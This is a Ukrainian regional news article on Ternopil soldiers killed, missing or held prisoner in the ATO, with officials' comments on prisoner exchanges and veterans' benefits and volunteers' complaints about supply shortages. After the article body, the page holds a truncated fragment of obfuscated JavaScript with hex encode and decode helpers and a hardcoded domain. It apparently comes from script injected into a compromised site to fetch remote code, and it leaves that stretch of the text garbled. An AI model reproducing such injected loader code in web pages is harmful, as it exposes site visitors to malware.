Ви знаходитесь: Головна / Новини / За даними Міноборони на Сході знаходиться два полонених з Тернопільщини та один зниклий безвісти

За даними Міноборони на Сході знаходиться два полонених з Тернопільщини та один зниклий безвісти

83 військовослужбовці з Тернопільщини загинули під час проведення АТО. Зараз один вважається безвісти зниклим, ще двоє знаходяться в полоні,– такі офіційні дані ЗСУ.

ОЛЕКСІЙ НОЗДРАЧОВ, начальник Управління військово-цивільного співробітництва ЗСУ

«Ми знаємо, де вони знаходяться, ми знаємо в якому вони стані і я думаю, що найближчим часом, це залежить не стільки від нас, скільки від роботи Служби безпеки України, але вони в списках на обмін і, як тільки у нас буде можливість, ми зможемо наших хлопців забрати».

За роки АТО з Тернопільської області територіальну цілісність країни захищали більше трьох тисяч бійців.

СТЕПАН БАРНА, голова Тернопільської ОДА

«З них – 53 інваліди війни. Окрім того 121 особи, в тому числі, в 17 неповнолітнім дітям встановлено право на пільги, як члену загиблого ветерана війни і на якого поширюються програми підтримки, в тому числі, оздоровлення за кордоном».

На зустрічі із представниками ЗСУ, військкоматів, місцевої влади та громадськості, родичі військовослужбовців та волонтери мали змогу обговорити питання, які їх найбільше хвилюють.

ВАСИЛЬ КОНЬКО, керівник волонтерської групи «Схід та Захід єдині» на заході України

«Остання поїздка мене здивувала тим, що я повернувся у 2014 рік, те саме: ні форми, ні берців, ні води. На блок-посту в Нагірському батальйон «Тернопіль» стоїть без нічних приборів. Нічні прибори були видані ще в 2014 році.  По 44-тій, та ж сама проблема, хлопці дзвонять, харчі, питна вода, ліки є частково».

Держслужбовці відповіли, що про проблему з водою та неякісною формою – знають і намагаються шукати виходи, а щодо недостатнього харчування інформації наразі не отримували.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top